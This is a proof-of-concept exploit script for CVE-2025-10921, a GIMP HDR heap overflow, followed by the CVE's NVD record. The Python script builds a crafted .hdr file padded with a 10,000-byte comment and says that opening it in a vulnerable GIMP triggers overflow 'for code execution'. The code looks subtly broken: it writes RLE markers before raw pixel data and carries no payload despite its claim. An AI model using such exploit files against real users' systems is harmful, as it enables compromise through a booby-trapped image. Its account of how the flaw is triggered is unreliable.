CVE-2025-10921

# CVE-2025-10921 PoC - GIMP HDR Heap Buffer Overflow # Generate malicious HDR file to trigger heap-based buffer overflow # This PoC creates a crafted HDR file with oversized data in specific fields import struct import os def create_malicious_hdr(output_path): """ Create a malicious HDR file to trigger buffer overflow in GIMP HDR parser. The vulnerability exists when parsing RGBE format HDR files where insufficient length validation leads to heap buffer overflow. """ # HDR file header header = b'#?RADIANCE\n' # Craft resolution line with oversized data # Normal format: -Y 1024 +X 1024 # We inject extra data to trigger overflow in buffer handling resolution = b'-Y 2048 +X 2048\n' # Create malformed exposure/comment section # This section will contain oversized data to overflow heap buffer comment_size = 10000 # Oversized to trigger overflow malicious_comment = b'EXPOSURE=1.0\n' malicious_comment += b'COMMENT=' + b'A' * comment_size + b'\n' # HDR commands section - inject overflow data commands = b'FORMAT=32-bit_rle_rgbe\n' commands += b'\n' # Generate RGBE data - normal HDR scanlines # Each scanline: 4 bytes per pixel (R,G,B,E) width = 2048 height = 2048 rgbe_data = bytearray() for y in range(height): # Scanline start marker for RLE encoding rgbe_data += struct.pack('BBBB', 2, 2, (width >> 8) & 0xFF, width & 0xFF) # Create scanline data with RGBE format # RLE compressed scanline scanline = bytearray() for x in range(width): # RGBE format: 1 byte exponent, 3 bytes mantissa r = 128 # Red channel g = 128 # Green channel b = 128 # Blue channel e = 128 # Exponent scanline += bytes([r, g, b, e]) rgbe_data += bytes(scanline) # Write the malicious HDR file with open(output_path, 'wb') as f: f.write(header) f.write(resolution) f.write(malicious_comment) f.write(commands) f.write(rgbe_data) print(f"[+] Malicious HDR file created: {output_path}") print(f"[+] File size: {os.path.getsize(output_path)} bytes") print(f"[+] Comment section size: {len(malicious_comment)} bytes") def verify_hdr_structure(file_path): """Verify the generated HDR file structure""" with open(file_path, 'rb') as f: content = f.read(100) print(f"[+] File header: {content[:50]}") if b'RADIANCE' in content: print("[+] Valid HDR header detected") if __name__ == '__main__': output_file = 'CVE-2025-10921_poc.hdr' print("=" * 60) print("CVE-2025-10921 GIMP HDR Heap Buffer Overflow PoC") print("=" * 60) create_malicious_hdr(output_file) verify_hdr_structure(output_file) print("\n[!] Usage: Open the generated .hdr file with vulnerable GIMP version") print("[!] This will trigger heap-based buffer overflow for code execution")

{"cve": {"id": "CVE-2025-10921", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:34.797", "lastModified": "2025-11-04T17:08:46.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GIMP HDR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of HDR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27803."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "103D75C8-35B7-4E50-B75C-2D75294CB7AC"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED"}]}]}], "references": [{"url": "https://gitlab.gnome.org/GNOME/gegl/-/commit/0e68b7471dabf2800d780819c19bd5e6462f565f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-910/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00021.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}